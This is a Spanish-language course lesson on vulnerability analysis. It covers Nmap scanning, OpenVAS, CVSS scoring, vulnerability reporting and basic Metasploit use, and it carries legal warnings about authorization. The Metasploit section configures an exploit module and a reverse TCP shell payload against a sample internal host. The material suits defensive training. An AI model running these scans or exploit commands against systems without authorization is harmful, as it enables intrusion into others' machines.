🔍 Análisis de Vulnerabilidades
Lección 5 de 6 — Herramientas, metodologías y frameworks para identificar y evaluar vulnerabilidades en sistemas.
1. Nmap — Escaneo de Red y Descubrimiento
Nmap (Network Mapper) es la herramienta estándar para descubrir hosts, puertos abiertos y servicios en una red.
Comandos esenciales
# Escaneo básico de puertos
nmap 192.168.1.1
# Escaneo de todos los puertos (1-65535)
nmap -p- 192.168.1.1
# Detección de versión de servicios
nmap -sV 192.168.1.1
# Detección de SO
nmap -O 192.168.1.1
# Escaneo completo (versión + SO + scripts)
nmap -A 192.168.1.1
# Escaneo sigiloso (SYN scan)
nmap -sS 192.168.1.1
# Escaneo de red completa
nmap -sn 192.168.1.0/24
# Con scripts NSE (Nmap Scripting Engine)
nmap --script vuln 192.168.1.1
nmap --script http-headers,http-title 192.168.1.1
💡 Consejo: usa -sV --version-intensity 9 para detectar versiones con mayor precisión. Combina con --script vuln para detectar vulnerabilidades conocidas.
2. OpenVAS / Greenbone — Escáner de Vulnerabilidades
OpenVAS (Open Vulnerability Assessment System) es un escáner completo de vulnerabilidades, ahora parte de Greenbone Security Manager.
- Base de datos: más de 50,000 pruebas de vulnerabilidad (NVT - Network Vulnerability Tests).
- Arquitectura: servidor (openvassd) + cliente (Greenbone Security Assistant web UI).
- Feed: actualizaciones diarias de pruebas.
Instalación y uso básico
# Instalación en Debian/Ubuntu
apt install openvas
gvm-setup # Configuración inicial (descarga feeds)
gvm-start # Iniciar servicios
# Escaneo por línea de comandos
gvm-cli --gmp-username admin --gmp-password pass \
socket --xmlfile scan-config.xml
OpenVAS produce informes detallados con CVSS scores, referencias CVE y recomendaciones de mitigación.
3. CVSS — Common Vulnerability Scoring System
CVSS es un sistema estandarizado (FIRST.org) para puntuar la severidad de vulnerabilidades. Actualmente en versión 4.0.
| Severidad |
Rango CVSS v3 |
Color |
| CRÍTICO |
9.0 - 10.0 |
Púrpura |
| ALTO |
7.0 - 8.9 |
Rojo |
| MEDIO |
4.0 - 6.9 |
Naranja |
| BAJO |
0.1 - 3.9 |
Amarillo |
| NINGUNO |
0.0 |
Gris |
Métricas base de CVSS
- AV (Attack Vector): ¿Se explota remotamente (N) o localmente (L)?
- AC (Attack Complexity): ¿Requiere condiciones especiales (H) o es trivial (L)?
- PR (Privileges Required): ¿Se necesitan privilegios (N, L, H)?
- UI (User Interaction): ¿Requiere interacción del usuario (N, R)?
- C/I/A (Confidentiality, Integrity, Availability Impact): impacto en la tríada CIA.
# Ejemplo: Log4Shell (CVE-2021-44228)
# CVSS: 10.0 (CRÍTICO)
# AV:N / AC:L / PR:N / UI:N / S:C / C:H / I:H / A:H
# → Explotación remota, sin autenticación, impacto total en CIA
4. Informes de Vulnerabilidades
Un informe profesional debe incluir:
- Resumen ejecutivo: para la dirección (riesgos de negocio, no tecnicismos).
- Alcance: qué sistemas fueron evaluados, metodología.
- Hallazgos: lista de vulnerabilidades con severidad (CVSS).
- Detalle técnico: CVE, descripción, prueba de concepto (PoC), sistemas afectados.
- Recomendaciones: pasos concretos para mitigar cada vulnerabilidad.
- Plan de remediación: prioridades y plazos sugeridos.
⚠️ Importante: Nunca incluyas credenciales reales o datos sensibles en informes compartidos. Usa formato cifrado (PDF protegido) para distribución.
5. Metasploit Framework — Pentesting Básico
Metasploit es el framework más popular para desarrollar y ejecutar exploits. Uso exclusivo en entornos autorizados.
# Iniciar Metasploit
msfconsole
# Buscar un exploit para una vulnerabilidad específica
msf6 > search log4shell
msf6 > search type:exploit platform:linux
# Usar un módulo
msf6 > use exploit/multi/http/struts2_rest_xstream
msf6 > show options
msf6 > set RHOSTS 192.168.1.100
msf6 > set RPORT 8080
msf6 > check # Verificar si el objetivo es vulnerable
msf6 > exploit # Ejecutar exploit
# Payloads comunes
msf6 > set PAYLOAD linux/x64/shell/reverse_tcp
msf6 > set LHOST 192.168.1.50
msf6 > set LPORT 4444
Módulos de Metasploit
- exploit/ — exploits activos contra vulnerabilidades.
- payload/ — código que se ejecuta tras el exploit (reverse shell, meterpreter).
- auxiliary/ — herramientas auxiliares (scanners, fuzzers, DoS).
- post/ — módulos post-explotación (escalada de privilegios, recolección).
- nops/ — generadores de NOP sleds.
⚠️ Advertencia legal: Metasploit solo debe usarse en sistemas que posees o con autorización explícita por escrito. El uso no autorizado es ilegal en la mayoría de jurisdicciones.
🔄 Ciclo de Vida del Análisis de Vulnerabilidades
- Descubrimiento: identificar activos (Nmap, Shodan).
- Evaluación: escanear vulnerabilidades (OpenVAS, Nessus).
- Análisis: priorizar según CVSS, contexto del negocio.
- Remediación: aplicar parches, configuraciones, WAF.
- Verificación: re-escanear para confirmar que se mitigó.
- Reporte: documentar el proceso y resultados.
📌 Resumen
- Nmap para descubrimiento y enumeración de servicios.
- OpenVAS para escaneo automatizado de vulnerabilidades.
- CVSS para priorizar riesgos (CRÍTICO 9.0-10.0).
- Informes claros con resumen ejecutivo y detalle técnico.
- Metasploit para explotación controlada en entornos autorizados.